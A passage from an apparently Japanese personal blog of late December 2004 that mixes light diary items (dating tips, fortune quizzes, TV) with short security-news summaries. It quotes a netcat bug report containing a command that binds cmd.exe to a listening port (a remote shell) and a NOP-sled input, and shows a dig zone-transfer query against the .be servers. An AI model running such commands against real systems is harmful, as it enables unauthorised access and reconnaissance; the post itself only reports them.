」に続いて、“生命維持”に欠かせない食べ物の材料を届けてくれる「食材配達サービス」にスポットを当ててみた。```お。私のための記事ですか?これ。(^-^; さぁ皆さんも一緒にひきこもりましょ♪(笑)[IT] * NYの新年カウントダウンをMSN Videoで生中継 (ITmedia)
textile米Microsoftは12月28日、ニューヨークのタイムズスクエアで毎年恒例になっている新年カウントダウンの模様をMSN Videoで独占ライブ中継すると発表した。31日午後6時〜1日午前0時15分だそうです。見たらニューヨーク気分が味わえるかもー。[セキュリティ] * [Full-Disclosure] Again: zone transfers, a spammer's dream?
ソーン転送を許可してしまっている TLD がこーんなにあるよ!というレポートが Full-Disclosure ML に流れていました。textile◆許可していると報告のあったTLD:ACADAGALANAOARARPABABDBEBFBGBIBJBMBNBOBSBTBVBWCFCICKCMCUCVCYDJDZECEEEGERESETFIFJFKFMGAGBGDGEGHGLGNGPGQGSGTGUGWGYHNILININTIOJMJOKEKGKHKIKMKNKRKYKZLBLCLKLRLYMAMCMDMGMHMILMMMNMRMSMTMUSEUMMWMXMYMZNANCNENGNINPOMPEPGPKPYSGSHSJSKSMSNSOSRSTSUSVSZTCTDTHTJTMTNTOTPTRTTTZUAUGUKUMUYVAVCVEVGVIVUYEYUZAZW試しに、話題になっていた .be で試してみましたが、textile$ dig @b*******.ns.dns.be be axfr | wc -l 931381$という状況でした。spammer's dream ですか...(^-^;[雑談] * 出会い系サイト勝ち組ノウハウ (出会いの雑学)
人生の先輩、恋の師匠である* 酒ずきんさん
からの情報。textileクリスマス、年末年始、バレンタイン・・・それぞれの時期で、出会い系だけではなく、世の中全体でそれ相応の雰囲気を出しているので、最悪は彼氏彼女がいないと、まるで人生の敗北者の様な雰囲気がある時さえあります。ぁぅ。(ここまでハッキリ書かれると、まぢヘコみますが。(>_<))textile1.焦らず2.急がず3.マイペースこれが一番の特効薬かと思います。なるほど。(出会い系かぁ。そろそろ始めないと間に合わないかな・・・。(涙))[セキュリティ] * Heap overflow in Mozilla Browser <= 1.7.3 NNTP code. (Bugtraq)
Mozilla 1.7.3 以前には NNTPプロトコルハンドラにヒープオーバーフローの問題が存在していたとのことです。(Mozilla 1.7.5 で修正済み。) これは、news:// に長い引数を指定することで発生する問題で、リモートの攻撃者に任意のコードを実行されてしまう恐れがあるとのことです。この報告者は、「I decided to make this bug public because Mozilla Team hasn't warned users.」と言っていますが、確かに、『* Known Vulnerabilities in Mozilla
』には、この問題が含まれていないように見えますね。[雑談] * 法律用語“裏”辞典 (みそしる)
textile〜 冗談がわからない人ほど、読んでください 〜読んでもらえればわかりますが、簡単に言えば、法律用語辞典を、『悪魔の辞典』風に解釈してみたものです。ぁー。読んでると微妙な笑いに誘われます。(^-^;textile**おと・め【乙女】(名)** (1)年の若い娘。少女。 (2)思わず「おつじょ」と読んでしまったあなたは、司法試験受験生。「(3)はなずきんさんが自称するもの」と。(笑)2004/12/31(金)金曜日ー。(とうとう大晦日。)
[雑談] * アンパンマン占い
textileヤマガタさんは【 ジャムおじさん 】です! ● ジャムおじさんさんのあなたは、責任感が強く、自分が一度やると決めたことは、少々の困難があっても粘り強くやりとげるタイプ。多少時間はかかるが、慎重に目標に向かって確実に歩み寄ります。何事もよく考えて上で行動し、めったなことでは冒険はしません。単調な仕事も飽きずに長時間こなすことができます。 ● ヤマガタさんの金運最高デーは、8月19日です!いやー、単調な作業、結構、ガマンできなくなるタイプですけども。(うーむ、金運良くなるまで半年待たないといけないんですか?(笑))ネタ元: * palm84さんの日記
[雑談] * 独身者が出会う「最高の場」は書店、NY世論調査 (CNN)
- ずきんさんの日記
で紹介されていました。textileアメリカン・エクスプレスは24日までに、25歳から35歳までのニューヨーク市民1003人の世論調査結果を発表、独身者同士が出会う「最高の場所」は、書店チェーン「Barnes & Noble」との回答が首位を占めた、と報告した。ロイター通信が報じた。「ノッティングヒルの恋人」ですか?(^-^; ってか、仮にタイプの女の子と書店で出遭ったとして、どうすれば良いんでしょ? ・・・ナンパですかね?(無理ー。)私、昔は土日に外に出かけるほぼ唯一の理由が「本屋に行く」だったんですが、最近はもっぱら amazon で買ってしまうので、ほんっとに外出なくなりましたわ。[雑談] netcat 1.11 に複数のバグ?◆* NetCat V 1.11 Multiple Bugs (Bugtraq)
textileexecute nc -p 777 -L -e cmd.execreate te file prova.txt and insert \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90...(256個以上)execute nc 127.0.0.1 777 < prova.txtの nc 1.11 ですが、まだ何かあるようです。[雑談] 虚構新聞社
- 「あ」+「ぬ」? 新字の採用を決定 国語審議会
- 米ロ間ホットラインに「オレオレ」電話
んな、バカな!(笑[セキュリティ] * [Full-Disclosure] Information System Security Assessment Framework (ISSAF) Draft 0.1
◆* Information System Security Assessment Framework Draft 0.1
**[PDF]**混然としてますが、中には有用な情報が埋まってるかも。[雑談] ですよね。レコ大を見てたら、華原朋美が『あなたがいれば』という曲を歌ったのですが、どうも聞き覚えがあるなーと思って検索したら、なるほど、ドラマ「東京湾景」の主題歌(韓国語)だった Weather Forecast の『君さえいれば』を日本語でカバーしたものだったんですね。知らなかったー。(^-^) レコ大に紅白かぁ。いよいよ今年も終わりですね...(しみじみ。)[セキュリティ] * [Full-Disclosure] Microsoft Data Access Dav1.1 PoC
Microsoft FrontPage 2000 に含まれる Microsoft DATA Access Internet Publishing Service Provider DAV 1.1 コンポーネントに問題があり、特殊な PUT リクエストを発行することで、リモートから任意のWebページをサーバ上に書き込むことができるそうです?? (認証も回避できるってことですかね?)
.jpg){kind=logo}
